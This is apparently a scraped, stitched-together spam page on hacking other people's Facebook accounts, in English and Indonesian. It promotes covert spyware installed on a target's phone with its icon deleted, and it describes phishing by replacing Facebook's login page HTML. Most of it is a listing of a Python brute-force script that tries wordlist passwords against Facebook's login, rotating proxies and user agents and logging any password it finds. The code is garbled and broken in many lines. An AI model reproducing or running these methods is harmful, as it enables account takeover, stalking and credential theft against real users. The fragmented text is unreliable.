Script Hack Fb

  1. Part 2: How to Hack Someone’s Facebook ID and Password. Spyic is a popular Facebook hack software. It is completely invisible and non-traceable. As such, you can hack someone’s Facebook ID without them growing suspicious at all. However, you have to be careful that after you install Spyic into the target phone, you should delete the Spyic icon.
  2. Cara Hack Facebook Orang Lain dengan Program CMD Software Windows 7 8 10 – Media sosial facebook (fb) memang menjadi tongkrongan maya yang banyak digandrungi netizen sehingga tak heran bila cara hack facebook orang lain menggunakan cmd software windows 7, 8, 10 menjadi bagian trik dari peretasan untuk berbagai kepenti.
  3. Menimpa Script HTML Halaman Login Resmi Facebokk dengan Script Hack FB Setelah anda selesai mendownload script hack FB pada langkah kedua tadi, selanjutnya copy lalu timpa file HTML halaman login resmi FB yang anda dapatkan pada langkah 1 tadi.
Jul 6th, 2015

Kode Script Hack Fb

Never

Hacker Script Hack Fb

Oct 08, 2020 Metode hack fb dengan script ini, masih work sebagai cara hack facebook dengan inspect element dan html cmd 2016, 2017, 2018. Namun sayangnya, script untuk hack fb ini tidak work di 2019. Mungkin karena facebook hackerapp ini sudah diketahui oleh facebook.

Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
Script hack fb html

Script Hack Fb Termux

  1. #!/usr/bin/python
  2. # This was written for educational purpose and pentest only. Use it at your own risk.
  3. # Author will not be responsible for any damage !!
  4. # Version : 1.0
  5. # https://www.facebook.com/groups/anonymousddosers/
  6. importre
  7. importsys
  8. importwarnings
  9. try:
  10. exceptImportError:
  11. print'[*] Please install mechanize python module first'
  12. exceptKeyboardInterrupt:
  13. sys.exit(1)
  14. importcookielib
  15. print'[*] Please install cookielib python module first'
  16. exceptKeyboardInterrupt:
  17. sys.exit(1)
  18. warnings.filterwarnings(action='ignore', message='.*gzip transfer encoding is experimental!', category=UserWarning)
  19. # define variable
  20. __programmer__ ='mmmuhahaha_ <hehe.haha@gmail.com>'
  21. verbose =False
  22. usepassproxy =False
  23. file=open(log,'a')
  24. checkpoint ='checkpoint'
  25. fblogin ='https://login.facebook.com/login.php?login_attempt=1'
  26. useragent =['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  27. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  28. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  29. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  30. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  31. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  32. 'Opera/8.00 (Windows NT 5.1; U; en)',
  33. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  34. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  35. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  36. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  37. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
  38. facebook =''
  39. / _| | | | |
  40. | _/ _` |/ __/ _ '_ / _ / _ | |/ /
  41. |_| __,_|______|_.__/ ___/ ___/|_|_
  42. Version : %s'' % (__programmer__, __version__)
  43. Usage : %s [options]
  44. Option : -w, --wordlist <filename> | Wordlist used for bruteforcing
  45. -p, --proxy <host:port> | Set http proxy will be use
  46. -k, --usernameproxy <username> | Set username at proxy will be use
  47. -i, --passproxy <password> | Set password at proxy will be use
  48. -l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
  49. '' % (sys.argv[0],sys.argv[0],sys.argv[0])
  50. Usage : %s [option]
  51. '' % sys.argv[0]
  52. def helpme():
  53. print option
  54. file.write(option)
  55. print facebook
  56. file.write(facebook)
  57. sys.exit(1)
  58. for arg insys.argv:
  59. if arg.lower()'-u'or arg.lower()'--user':
  60. username =sys.argv[int(sys.argv[1:].index(arg))+2]
  61. elif arg.lower()'-w'or arg.lower()'--wordlist':
  62. wordlist =sys.argv[int(sys.argv[1:].index(arg))+2]
  63. log =sys.argv[int(sys.argv[1:].index(arg))+2]
  64. useproxy =True
  65. elif arg.lower()'-k'or arg.lower()'--userproxy':
  66. usw =sys.argv[int(sys.argv[1:].index(arg))+2]
  67. elif arg.lower()'-i'or arg.lower()'--passproxy':
  68. usp =sys.argv[int(sys.argv[1:].index(arg))+2]
  69. elif arg.lower()'-v'or arg.lower()'--verbose':
  70. elif arg.lower()'-h'or arg.lower()'--help':
  71. eliflen(sys.argv)<=1:
  72. exceptIOError:
  73. exceptNameError:
  74. exceptIndexError:
  75. try:
  76. userEmail = word[0:pos]
  77. print('password: ' + word )
  78. file.write('[*] Trying ' + userEmail + '::' + word + 'n')
  79. rch =random.choice(useragent)
  80. # print('User Agent: ' + rch )
  81. # for form in br.forms():
  82. # print form
  83. # To show all control elements in the form
  84. # for control in br.form.controls:
  85. # print 'type=%s, name=%s value=%s' % (control.type, control.name, br[control.name])
  86. # To dump cookies data being sent and received
  87. # If email still auto-filled on login form, this script would not work as expected, so we need to release it
  88. NotMe ='notme_cuid'
  89. if(NotMe in link.url):
  90. response = br.follow_link(link)
  91. br.form['email']= userEmail
  92. br.submit()
  93. print response
  94. print'nn[*] Logging in success...'
  95. print'[*] Password : %sn' % (word)
  96. file.write('n[*] userEmail : %s' % (userEmail))
  97. # After successful login, force to Log Out (to clear the cookies & session - important!)
  98. if form.attrs['id']'logout_form':
  99. br.submit()
  100. print'nn[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed'
  101. print'[*] Password : %sn' % (word)
  102. file.write('n[*] Logging in success...but stuck on checkpoint! Victim maybey has been noticed')
  103. file.write('n[*] Password : %snn' % (word))
  104. # In checkpoint, this account may has been logged in, so we need to Log it Out after successful login
  105. for link in br.links():
  106. request = br.click_link(link)
  107. # print response.geturl()
  108. # else:
  109. print'n[*] Exiting program...n'
  110. except mechanize._mechanize.FormNotFoundError:
  111. file.write('n[*] Form Not Foundn')
  112. except mechanize._form.ControlNotFoundError:
  113. file.write('n[*] Control Not Foundn')
  114. # def dump():
  115. # print cookie.name, cookie.value
  116. def releaser():
  117. for word in words:
  118. global br
  119. # Uncomment this variable if you want to enable dump()
  120. try:
  121. cj =cookielib.LWPCookieJar()
  122. br.set_handle_equiv(True)
  123. br.set_handle_redirect(True)
  124. br.set_handle_robots(False)
  125. br.set_debug_redirects(False)
  126. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  127. br.set_proxies({'http': proxy})
  128. br.add_proxy_password(usw, usp)
  129. br.set_debug_http(True)
  130. br.set_debug_redirects(True)
  131. print'n[*] Exiting program...n'
  132. sys.exit(1)
  133. preventstrokes =open(wordlist,'r')
  134. count =0
  135. words[count]= words[count].strip()
  136. exceptIOError:
  137. file.write('n[*] Error: Check your wordlist pathn')
  138. exceptNameError:
  139. exceptKeyboardInterrupt:
  140. file.write('n[*] Exiting program...n')
  141. try:
  142. print'n[*] Starting attack at %s' % time.strftime('%X')
  143. #print '[*] Account for bruteforcing %s' % (username)
  144. print'[*] Bruteforcing, please wait...'
  145. file.write('n[*] Starting attack at %s' % time.strftime('%X'))
  146. #file.write('n[*] Account for bruteforcing %s' % (username))
  147. file.write('n[*] Loaded : %d words' % int(len(words)))
  148. file.write('n[*] Bruteforcing, please wait...n')
  149. print'n[*] Exiting program...n'
  150. try:
  151. bruteforce(word)
  152. helpme()
  153. if __name__ '__main__':
Script

Script Hack Fb Termux 2020 Anti Checkpoint

Comments are closed.